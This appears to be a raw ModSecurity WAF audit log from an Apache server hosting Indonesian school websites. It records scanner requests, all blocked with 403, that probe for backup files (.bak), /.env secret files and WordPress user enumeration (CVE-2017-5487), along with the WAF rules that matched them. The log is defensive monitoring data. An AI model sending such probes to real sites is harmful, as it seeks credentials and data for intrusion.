Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e5d7619-Z-- --13f65812-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84wAAABg 103.236.140.4 56796 103.236.140.4 8181 --13f65812-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224822 --13f65812-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13f65812-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883718061 14617 (- - -) Stopwatch2: 1747543883718061 14617; combined=26579, p1=321, p2=436, p3=0, p4=0, p5=12925, sr=67, sw=0, l=0, gc=12897 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13f65812-Z-- --16cbb175-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTBQAAAIo 103.236.140.4 58354 103.236.140.4 8181 --16cbb175-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.5.2) Gecko/20100101 Firefox/60.5.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123177302 --16cbb175-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --16cbb175-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883766910 2078 (- - -) Stopwatch2: 1747543883766910 2078; combined=741, p1=351, p2=363, p3=0, p4=0, p5=27, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16cbb175-Z-- --8aee5513-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o85AAAAAU 103.236.140.4 56796 103.236.140.4 8181 --8aee5513-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224825 --8aee5513-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8aee5513-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883804367 1797 (- - -) Stopwatch2: 1747543883804367 1797; combined=668, p1=338, p2=302, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8aee5513-Z-- --e8ecc857-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o85QAAAAY 103.236.140.4 56796 103.236.140.4 8181 --e8ecc857-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224832 --e8ecc857-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e8ecc857-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883816261 1819 (- - -) Stopwatch2: 1747543883816261 1819; combined=675, p1=349, p2=300, p3=0, p4=0, p5=26, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8ecc857-Z-- --bd621a30-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o85wAAAA8 103.236.140.4 56796 103.236.140.4 8181 --bd621a30-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093599 --bd621a30-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bd621a30-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883823459 1638 (- - -) Stopwatch2: 1747543883823459 1638; combined=641, p1=316, p2=297, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd621a30-Z-- --0d360638-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o86QAAAAM 103.236.140.4 56796 103.236.140.4 8181 --0d360638-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/52.0.2871.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093616 --0d360638-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d360638-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883852336 1646 (- - -) Stopwatch2: 1747543883852336 1646; combined=710, p1=388, p2=295, p3=0, p4=0, p5=27, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d360638-Z-- --c071f82e-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTCQAAAI0 103.236.140.4 58354 103.236.140.4 8181 --c071f82e-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224852 --c071f82e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c071f82e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883852896 2273 (- - -) Stopwatch2: 1747543883852896 2273; combined=710, p1=312, p2=366, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c071f82e-Z-- --a4c3f875-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTCwAAAJQ 103.236.140.4 58354 103.236.140.4 8181 --a4c3f875-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123177323 --a4c3f875-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a4c3f875-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883878010 1650 (- - -) Stopwatch2: 1747543883878010 1650; combined=672, p1=331, p2=315, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4c3f875-Z-- --16e83e63-A-- [18/May/2025:11:58:16 +0700] aClo6Bir-GlPrFVVKe5FlAAAAEw 103.236.140.4 33482 103.236.140.4 8181 --16e83e63-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 142.93.129.190 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --16e83e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16e83e63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747544296911539 766 (- - -) Stopwatch2: 1747544296911539 766; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16e83e63-Z-- --e7bdae12-A-- [18/May/2025:12:05:33 +0700] aClqnfypzAd0elWOk7o-jgAAAAk 103.236.140.4 38038 103.236.140.4 8181 --e7bdae12-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e7bdae12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7bdae12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747544733705100 698 (- - -) Stopwatch2: 1747544733705100 698; combined=313, p1=285, p2=0, p3=0, p4=0, p5=28, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7bdae12-Z-- --05521f1d-A-- [18/May/2025:12:13:20 +0700] aClscEPRqak7bVuUS6cWdgAAAIs 103.236.140.4 42908 103.236.140.4 8181 --05521f1d-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 207.154.212.47 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --05521f1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05521f1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747545200574814 850 (- - -) Stopwatch2: 1747545200574814 850; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05521f1d-Z-- --b6bfad37-A-- [18/May/2025:12:14:55 +0700] aClszxir-GlPrFVVKe5IAQAAAFI 103.236.140.4 43898 103.236.140.4 8181 --b6bfad37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.46.219.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.46.219.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b6bfad37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6bfad37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747545295140780 2649 (- - -) Stopwatch2: 1747545295140780 2649; combined=1300, p1=428, p2=843, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b6bfad37-Z-- --f9ac6100-A-- [18/May/2025:12:46:50 +0700] aCl0SkPRqak7bVuUS6cd7wAAAJU 103.236.140.4 38120 103.236.140.4 8181 --f9ac6100-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.63.48 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.63.48 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f9ac6100-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9ac6100-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747547210720311 845 (- - -) Stopwatch2: 1747547210720311 845; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9ac6100-Z-- --e43c044e-A-- [18/May/2025:13:02:35 +0700] aCl3-xir-GlPrFVVKe5PbgAAAEM 103.236.140.4 45192 103.236.140.4 8181 --e43c044e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; i1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36 Accept-Charset: utf-8 --e43c044e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e43c044e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747548155004978 971 (- - -) Stopwatch2: 1747548155004978 971; combined=368, p1=326, p2=0, p3=0, p4=0, p5=42, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e43c044e-Z-- --8b0e9354-A-- [18/May/2025:13:07:50 +0700] aCl5NkPRqak7bVuUS6cgdwAAAJg 103.236.140.4 45222 103.236.140.4 8181 --8b0e9354-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.3.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.3.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8b0e9354-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b0e9354-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747548470600448 846 (- - -) Stopwatch2: 1747548470600448 846; combined=343, p1=299, p2=0, p3=0, p4=0, p5=43, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b0e9354-Z-- --bc687e27-A-- [18/May/2025:14:14:43 +0700] aCmI4xir-GlPrFVVKe5QbgAAAE8 103.236.140.4 47108 103.236.140.4 8181 --bc687e27-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 54.78.115.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bc687e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc687e27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747552483947180 2860 (- - -) Stopwatch2: 1747552483947180 2860; combined=1269, p1=416, p2=819, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc687e27-Z-- --94065421-A-- [18/May/2025:14:17:12 +0700] aCmJeBir-GlPrFVVKe5QygAAAEM 103.236.140.4 47922 103.236.140.4 8181 --94065421-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --94065421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94065421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747552632629074 772 (- - -) Stopwatch2: 1747552632629074 772; combined=328, p1=291, p2=0, p3=0, p4=0, p5=36, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94065421-Z-- --ed7beb57-A-- [18/May/2025:14:17:14 +0700] aCmJehir-GlPrFVVKe5QzwAAAEs 103.236.140.4 47936 103.236.140.4 8181 --ed7beb57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --ed7beb57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed7beb57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747552634852168 715 (- - -) Stopwatch2: 1747552634852168 715; combined=305, p1=268, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
